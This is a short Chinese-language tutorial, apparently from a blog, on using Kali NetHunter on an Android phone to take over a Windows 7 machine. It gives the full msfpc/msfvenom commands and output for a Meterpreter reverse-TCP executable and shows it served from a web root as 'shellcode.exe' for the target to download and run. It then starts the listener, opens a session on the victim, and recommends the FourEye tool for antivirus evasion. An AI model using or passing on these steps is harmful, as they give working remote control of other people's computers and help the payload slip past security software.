环境 |
Window7 64位 |
安卓手机(Nethunter) |
Payload生成器设置好端口7100,Windows平台后生成脚本到SDCARD
cd /sdcard/; msfpc windows 192.168.2.51 7100 msf reverse staged tcp
┌──(rootcd /sdcard/; msfpc taged tcp
[*] MSFvenom Payload Creator (MSFPC v1.4.5)
[i] IP: 192.168.2.51
[i] PORT: 7100
[i] TYPE: windows (windows/meterpreter/reverse_tcp)
[i] CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe \
--platform windows -a x86 -e generic/none LHOST=192.168.2.51 LPORT=7100 \
> '/sdcard/windows-meterpreter-staged-reverse-tcp-7100.exe'
[i] File (/sdcard/windows-meterpreter-staged-reverse-tcp-7100.exe) already exists. Overwriting...
[i] windows meterpreter created: '/sdcard/windows-meterpreter-staged-reverse-tcp-7100.exe'
[i] MSF handler file: '/sdcard/windows-meterpreter-staged-reverse-tcp-7100-exe.rc'
[i] Run: msfconsole -q -r '/sdcard/windows-meterpreter-staged-reverse-tcp-7100-exe.rc'
[?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
[*] Done!
将EXE复制到网站根目录,让Windows下载执行
cp /sdcard/windows-meterpreter-staged-reverse-tcp-7100.exe /var/www/html/shellcode.exe
控制台输入上面提示命令:
msfconsole -q -r '/sdcard/windows-meterpreter-staged-reverse-tcp-7100-exe.rc'
输入sessions 1链接上目标机器:
链接成功,放个音乐,显示 Ok
使用教程到此结束。
免杀推荐使用FourEye:
git clone https://github.com/lengjibo/FourEye.git